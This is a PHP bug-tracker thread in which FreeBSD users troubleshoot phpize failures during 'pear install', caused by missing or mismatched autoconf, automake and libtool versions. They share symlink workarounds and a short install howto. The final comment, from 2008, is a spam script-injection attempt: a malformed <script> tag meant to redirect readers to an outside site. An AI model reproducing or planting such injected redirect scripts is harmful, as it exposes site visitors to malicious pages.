php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #56313 pear fails with aclocal error
Submitted: 2005-02-20 21:07 UTC Modified: 2005-10-23 10:05 UTC
From: alan at fromorbit dot com Assigned:
Status: Not a bug Package: ps (PECL)
PHP Version: 5.0.3 OS: FreeBSD 5.03
Private report: No CVE-ID: None
 [2005-02-20 21:07 UTC] alan at fromorbit dot com
Description:
------------
I've written a PS printing module for our website, but I developed it under Fedora Core 3, now I'm trying to roll it out onto our servers running FreeBSD and I'm struck with this problem :-

-----------
[root@thing4 root]# pear install ps
downloading ps-1.3.1.tgz ...
Starting to download ps-1.3.1.tgz (155,392 bytes)
.................................done: 155,392 bytes
2 source files, building
running: phpize
Configuring for:
PHP Api Version:         20031224
Zend Module Api No:      20041030
Zend Extension Api No:   220040412
aclocal: not found
`phpize' failed
[root@thing4 root]# 
------------

If I symlink aclocal, autoconf, autoheader to the FreeBSD aclocal15, autoconf253, autoheader253 I get the following new error

------------
[root@thing4 root]# pear install ps
downloading ps-1.3.1.tgz ...
Starting to download ps-1.3.1.tgz (155,392 bytes)
.................................done: 155,392 bytes
2 source files, building
running: phpize
Configuring for:
PHP Api Version:         20031224
Zend Module Api No:      20041030
Zend Extension Api No:   220040412
autoheader: `config.h.in' is created
-f: not found
`phpize' failed
[root@thing4 root]# 
-------------

I've poked around and it seems to be related to the libtoolize function in the phpize command.

What can I do to get this to compile??


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2005-03-15 03:19 UTC] uzi at bmby dot com
I did the same under FreeBSD 5.3 ( php-pear compiled from source, not ports) and got this error :

www# pear install zip
downloading zip-1.0.tgz ...
Starting to download zip-1.0.tgz (4,930 bytes)
.....done: 4,930 bytes
3 source files, building
running: phpize
Configuring for:
PHP Api Version:         20031224
Zend Module Api No:      20041030
Zend Extension Api No:   220040412
aclocal: not found
`phpize' failed

after that

www# cd /usr/local/bin/
www# ln -s autoconf259 autoconf
www# ln -s automake19 automake
www# ln -s autoheader259 autoheader
www# /usr/local/bin/pear install zip
downloading zip-1.0.tgz ...
Starting to download zip-1.0.tgz (4,930 bytes)
.....done: 4,930 bytes
3 source files, building
running: phpize
Configuring for:
PHP Api Version:         20031224
Zend Module Api No:      20041030
Zend Extension Api No:   220040412
configure.in:9: warning: underquoted definition of PHP_WITH_PHP_CONFIG
  run info '(automake)Extending aclocal'
  or see http://sources.redhat.com/automake/automake.html#Extending-aclocal
configure.in:32: warning: underquoted definition of PHP_EXT_BUILDDIR
configure.in:33: warning: underquoted definition of PHP_EXT_DIR
configure.in:34: warning: underquoted definition of PHP_EXT_SRCDIR
configure.in:35: warning: underquoted definition of PHP_ALWAYS_SHARED
acinclude.m4:19: warning: underquoted definition of PHP_PROG_RE2C
acinclude.m4:1915: warning: underquoted definition of PHP_TEST_BUILD
/usr/X11R6/share/aclocal/gtk.m4:7: warning: underquoted definition of AM_PATH_GTK
configure.in:65: error: possibly undefined macro: AC_PROG_LIBTOOL
      If this token and others are legitimate, please use m4_pattern_allow.
      See the Autoconf documentation.
`phpize' failed
 [2005-03-16 07:40 UTC] goran at goran dot aleborg dot se
I have the same problem as alan on a FreeBSD 4.10 machine with PHP 5.0.3. Tried to install both the zip and the tidy library, same error on both.

bash-2.05b# pear -v install tidy
downloading tidy-1.1.tgz ...
Starting to download tidy-1.1.tgz (9,128 bytes)
.....done: 9,128 bytes
3 source files, building
building in /tmp/tmpDVD0xU/tidy-1.1
running: phpize
Configuring for:
PHP Api Version:         20031224
Zend Module Api No:      20041030
Zend Extension Api No:   220040412
autoheader: `config.h.in' is created
-f: not found
`phpize' failed

I really need to get zip working because we use a product called Installatron with our webhosting control panel and zip is a requirement for that product. If anyone knows a workaround I'd be VERY happy :)
 [2005-03-16 18:26 UTC] sam at vision-bsd dot nl
Using FreeBSD-5.3

[00:03:15][root@freebsd:/usr/local/lib/php]# pear -v install tidy
downloading tidy-1.1.tgz ...
Starting to download tidy-1.1.tgz (9,128 bytes)
.....done: 9,128 bytes
+ create dir /usr/local/lib/php/doc/tidy
+ create dir /usr/local/lib/php/doc/tidy/examples
+ create dir /usr/local/lib/php/test/tidy/tests
3 source files, building
building in /tmp/tmp1n2qpw/tidy-1.1
running: phpize
aclocal: not found
`phpize' failed

Hope they have a workaround/fix very soon:((
 [2005-03-16 18:37 UTC] alan at fromorbit dot com
Guys I found a solution!

If I link /usr/local/bin :-

aclocal -> /usr/local/bin/aclocal19
autoconf -> /usr/local/bin/autoconf253
autoheader -> /usr/local/bin/autoheader253
libtool -> /usr/local/bin/libtool15
libtoolize -> /usr/local/bin/libtoolize15

and I linked /usr/local/share/aclocal19 :-

libtool.m4 -> ../aclocal/libtool15.m4

It will work. :)

Seems all very convoluted, and I don't remember having this much trouble with Pear on FreeBSD before.

Hope this helps,
Alan.
 [2005-03-17 04:54 UTC] sam at vision-bsd dot nl
Symlinks didn't work for me:

configure.in:65: error: possibly undefined macro: AC_PROG_LIBTOOL
      If this token and others are legitimate, please use
m4_pattern_allow.
      See the Autoconf documentation.
`phpize' failed
 [2005-03-17 06:13 UTC] goran at goran dot aleborg dot se
Thanks alan, your post made me thinking about the versions I was using. Following your post didn't do it for me at first, then I found this document:
http://www.php.net/anoncvs.php
Saying:
PHP uses an advanced configuration system that requires you to have the following tools. All necessary utilities can be obtained from the GNU FTP site. 

autoconf: 2.13 
automake: 1.4+ 
libtool: 1.4.x+ (except 1.4.2) 
bison: 1.28 (preferred), 1.35, or 1.75 
flex: 2.5.4 

This was news to me.
I have different versions on my box so I uninstalled everything and installed the versions above and then it worked. Looks like you HAVE TO use the above versions.
Below is a messy description on how I did it on FreeBSD 4.10.

pkg_info | grep auto
Deleted autoconf and automake package (I used newer versions)

wget ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4.10-release/All/autoconf-2.13.000227_5.tgz
pkg_add -v autoconf-2.13.000227_5.tgz

wget ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4.10-release/All/automake-1.4.5_9.tgz
pkg_add -v automake-1.4.5_9.tgz

pkg_info | grep libtool
Deleted libtool package (I used an older version)

wget ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4.10-release/All/libtool-1.4.3_3.tgz
pkg_add -v libtool-1.4.3_3.tgz

pkg_info | grep bison
bison-1.75_2
No update needed.

flex --version
/usr/bin/flex version 2.5.4
No update needed.

Basicly I had to do the same symlinks as alan, but with different version numbers on the directories.

ln -s /usr/local/bin/aclocal14 /usr/local/bin/aclocal
ln -s /usr/local/bin/automake14 /usr/local/bin/automake

Moved the files from /usr/local/share/aclocal14 to /usr/local/share/aclocal
rm aclocal14
mv aclocal aclocal14
ln -s aclocal14 aclocal

ln -s /usr/local/bin/autoconf213 /usr/local/bin/autoconf
ln -s /usr/local/bin/autoheader213 /usr/local/bin/autoheader
ln -s /usr/local/bin/libtool14 /usr/local/bin/libtool
ln -s /usr/local/bin/libtoolize14 /usr/local/bin/libtoolize
ln -s /usr/local/share/aclocal14/libtool14.m4 /usr/local/share/aclocal14/libtool.m4

After that it worked!
 [2005-03-28 18:08 UTC] mrblaq at vitalvinyl dot com
Whoa, I've just spent the longest time trying to fix this issue on my FreeBSD 5.3-release box.  To the best of my knowledge, the ports packages for autoconf, automake, and libtool that come with FreeBSD do not install to the correct paths that most would assume they'd use.  By following the link on http://www.php.net/anoncvs.php to ftp://ftp.gnu.org/pub/gnu/  I was able to install the GNU default sources for each library.  And, viloa! It's working.
 [2005-04-21 20:29 UTC] alan at fromorbit dot com
Guys, I've written a little howto to install ps on FreeBSD5.3 (because I needed to do it again and I couldn't remeber exactly what I did last time DOH!).


==========================


Compiling PS extention for FreeBSD 5.3
--------------------------------------

Make sure your have the following versions installed from ports/packages :-

autoconf-2.13.000227_5
automake-1.4.6_1
libtool-1.3.5_2

These versions are needed for PHP to compile extentions properly with 'phpize' (see http://www.php.net/anoncvs.php).

Create the following symbolic links to allow the 'phpize' command to find the FreeBSD versions :-

> ln -s autoconf213 autoconf
> ln -s autoheader213 autoheader
> ln -s automake14 automake
> ln -s libtool13 libtool
> ln -s libtoolize13 libtoolize

Download the latest 'ps' extention using 'pear' :-

> pear download ps
> tar zxvf ps-X.X.X.tgz
> cd ps-X.X.X

Edit the 'config.m4' and replace the reference to '-ldl' (for Linux only) with '-lintl'. Now do the following to complete the install :-

> ./configure
> make install

Done!
 [2005-05-27 03:43 UTC] goran at goran dot aleborg dot se
Tried alans little howto and he forgot this symlink:

> cd /usr/local/bin
> ln -s aclocal14 aclocal

after that it worked for me...
 [2005-06-10 11:09 UTC] hclima81 at yahoo dot com dot br
Hi.
I've the sabe problem and the problem persists after the installations of the packeges recommendend by Alan.
Does anybody have any other ideas???
Tks
 [2005-10-23 10:05 UTC] mike@php.net
Sorry, but your problem does not imply a bug in PECL itself.  For a
list of more appropriate places to ask for help using PECL, please
visit http://pecl.php.net/support/ as this bug system is not the
appropriate forum for asking support questions. 

Thank you for your interest in PECL.

The PHP build system requires automake-1.4
 [2008-06-24 00:36 UTC] adasdasd at addasd dot ad
<script>location"http://www.hackhell.com/"</script>
 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Sun May 16 19:01:23 2021 UTC